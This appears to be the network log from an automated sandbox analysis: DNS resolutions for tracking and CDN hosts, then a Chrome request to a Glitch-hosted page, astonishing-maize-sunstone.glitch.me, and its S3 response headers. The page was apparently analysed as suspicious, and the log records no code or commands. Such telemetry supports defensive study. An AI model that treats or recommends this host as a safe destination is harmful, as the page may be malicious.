                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479011059 CET1.1.1.1192.168.2.40x37d5No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479021072 CET1.1.1.1192.168.2.40x6d0bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.105837107 CET1.1.1.1192.168.2.40xc49eNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.105837107 CET1.1.1.1192.168.2.40xc49eNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.105837107 CET1.1.1.1192.168.2.40xc49eNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.105837107 CET1.1.1.1192.168.2.40xc49eNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.105837107 CET1.1.1.1192.168.2.40xc49eNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.106101036 CET1.1.1.1192.168.2.40x4aaNo error (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392942905 CET1.1.1.1192.168.2.40x3fd4No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.392990112 CET1.1.1.1192.168.2.40x879cNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.401123047 CET1.1.1.1192.168.2.40x477aNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.401268005 CET1.1.1.1192.168.2.40xe4aNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763140917 CET1.1.1.1192.168.2.40xf66cNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763140917 CET1.1.1.1192.168.2.40xf66cNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763140917 CET1.1.1.1192.168.2.40xf66cNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763140917 CET1.1.1.1192.168.2.40xf66cNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763140917 CET1.1.1.1192.168.2.40xf66cNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763355970 CET1.1.1.1192.168.2.40x3aa5No error (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.175443888 CET1.1.1.1192.168.2.40xb643No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.175443888 CET1.1.1.1192.168.2.40xb643No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.175443888 CET1.1.1.1192.168.2.40xb643No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.175586939 CET1.1.1.1192.168.2.40x4f4aNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.175586939 CET1.1.1.1192.168.2.40x4f4aNo error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.410929918 CET1.1.1.1192.168.2.40xdd6dNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.411315918 CET1.1.1.1192.168.2.40x6701No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.411315918 CET1.1.1.1192.168.2.40x6701No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.411315918 CET1.1.1.1192.168.2.40x6701No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.411315918 CET1.1.1.1192.168.2.40x6701No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.411315918 CET1.1.1.1192.168.2.40x6701No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.427077055 CET1.1.1.1192.168.2.40x7dcdNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.427077055 CET1.1.1.1192.168.2.40x7dcdNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.427077055 CET1.1.1.1192.168.2.40x7dcdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.427077055 CET1.1.1.1192.168.2.40x7dcdNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.428195953 CET1.1.1.1192.168.2.40xd58aNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.428195953 CET1.1.1.1192.168.2.40xd58aNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.428229094 CET1.1.1.1192.168.2.40xd697No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.428240061 CET1.1.1.1192.168.2.40x17bdNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.141.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com3.248.133.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.102.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.48.243.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.49.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.142.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com46.137.47.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.439886093 CET1.1.1.1192.168.2.40x22c4No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.55.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.440228939 CET1.1.1.1192.168.2.40xd514No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.440228939 CET1.1.1.1192.168.2.40xd514No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.440228939 CET1.1.1.1192.168.2.40xd514No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.620173931 CET1.1.1.1192.168.2.40x1489No error (0)eldersrural.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.620173931 CET1.1.1.1192.168.2.40x1489No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.620173931 CET1.1.1.1192.168.2.40x1489No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)eldersrural.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.55.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.141.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.213.0.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.212.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.135.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.48.243.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com3.248.133.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.629374027 CET1.1.1.1192.168.2.40x710bNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.31.224.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.802666903 CET1.1.1.1192.168.2.40xf8beNo error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.803939104 CET1.1.1.1192.168.2.40x7962No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.460270882 CET1.1.1.1192.168.2.40x75f9No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.460270882 CET1.1.1.1192.168.2.40x75f9No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.460270882 CET1.1.1.1192.168.2.40x75f9No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.460270882 CET1.1.1.1192.168.2.40x75f9No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.461462975 CET1.1.1.1192.168.2.40xf869No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.461462975 CET1.1.1.1192.168.2.40xf869No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.141.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.213.0.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.18.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com46.137.47.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.202.12.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.108.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.55.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462316990 CET1.1.1.1192.168.2.40x6495No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.23.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462364912 CET1.1.1.1192.168.2.40x8feeNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462364912 CET1.1.1.1192.168.2.40x8feeNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.462364912 CET1.1.1.1192.168.2.40x8feeNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.537532091 CET1.1.1.1192.168.2.40x7f29No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.537532091 CET1.1.1.1192.168.2.40x7f29No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.537683964 CET1.1.1.1192.168.2.40x33aaNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.537683964 CET1.1.1.1192.168.2.40x33aaNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.537683964 CET1.1.1.1192.168.2.40x33aaNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.828227997 CET1.1.1.1192.168.2.40x70e1No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.829111099 CET1.1.1.1192.168.2.40xbad9No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.942262888 CET1.1.1.1192.168.2.40x3c27No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.943617105 CET1.1.1.1192.168.2.40xa008No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238185883 CET1.1.1.1192.168.2.40x2b91No error (0)f.clarity.msvmss-clarity-ingest-eus-b.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238226891 CET1.1.1.1192.168.2.40xd01eNo error (0)f.clarity.msvmss-clarity-ingest-eus-b.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238238096 CET1.1.1.1192.168.2.40x5a74No error (0)eldersrural.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238238096 CET1.1.1.1192.168.2.40x5a74No error (0)eldersrural.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238238096 CET1.1.1.1192.168.2.40x5a74No error (0)eldersrural.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238257885 CET1.1.1.1192.168.2.40xf60aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.238257885 CET1.1.1.1192.168.2.40xf60aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.572921991 CET1.1.1.1192.168.2.40xf60aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.572921991 CET1.1.1.1192.168.2.40xf60aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.573357105 CET1.1.1.1192.168.2.40x3d61No error (0)f.clarity.msvmss-clarity-ingest-eus-b.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.574743986 CET1.1.1.1192.168.2.40xbd18No error (0)eldersrural.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.574743986 CET1.1.1.1192.168.2.40xbd18No error (0)eldersrural.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.574743986 CET1.1.1.1192.168.2.40xbd18No error (0)eldersrural.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.593969107 CET1.1.1.1192.168.2.40x7a29No error (0)f.clarity.msvmss-clarity-ingest-eus-b.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.714662075 CET1.1.1.1192.168.2.40x6134No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.714662075 CET1.1.1.1192.168.2.40x6134No error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.715234995 CET1.1.1.1192.168.2.40x6b20No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.927490950 CET1.1.1.1192.168.2.40x71f4No error (0)eldersrural.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.927490950 CET1.1.1.1192.168.2.40x71f4No error (0)eldersrural.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.927490950 CET1.1.1.1192.168.2.40x71f4No error (0)eldersrural.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.268302917 CET1.1.1.1192.168.2.40xd546No error (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.337349892 CET1.1.1.1192.168.2.40xf100No error (0)www.google.com172.217.18.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.337363005 CET1.1.1.1192.168.2.40x9c80No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.413475037 CET1.1.1.1192.168.2.40x7ab1No error (0)apimprd.ext.elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.413475037 CET1.1.1.1192.168.2.40x7ab1No error (0)apimprd.ext.elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.423490047 CET1.1.1.1192.168.2.40xf4bbNo error (0)yourir.info45.76.112.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.423490047 CET1.1.1.1192.168.2.40xf4bbNo error (0)yourir.info103.1.185.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:58.738334894 CET1.1.1.1192.168.2.40xdcd1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:58.738334894 CET1.1.1.1192.168.2.40xdcd1No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:58.739269972 CET1.1.1.1192.168.2.40x41e4No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:59.450416088 CET1.1.1.1192.168.2.40xe281No error (0)yourir.info45.76.112.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:59.450416088 CET1.1.1.1192.168.2.40xe281No error (0)yourir.info103.1.185.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:30:01.750933886 CET1.1.1.1192.168.2.40xaf5cNo error (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:30:02.003562927 CET1.1.1.1192.168.2.40x8f2No error (0)apimprd.ext.elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:30:02.003562927 CET1.1.1.1192.168.2.40x8f2No error (0)apimprd.ext.elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.44973654.91.146.1104432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:28:43 UTC679OUTGET / HTTP/1.1
                                                                                                                                                                                                            Host: astonishing-maize-sunstone.glitch.me
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:28:44 UTC509INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:28:44 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Content-Length: 1379538
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-amz-id-2: NuC7jac5YPAFu9Ie+u7buA9mrX9KrJZPHa1gHyLsdxZHgHy6umOX8TDIB+c0LJuEVzRI/T6fO7s=
                                                                                                                                                                                                            x-amz-request-id: DKY69VZ75F4407XQ
                                                                                                                                                                                                            last-modified: Tue, 05 Nov 2024 04:03:07 GMT
                                                                                                                                                                                                            etag: "834f48dcd027b791fc4978a00f1dd91e"
                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                            x-amz-version-id: G6adVcORL.QoFj0gvtNtggrxSvvpKuHn
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            server: AmazonS3
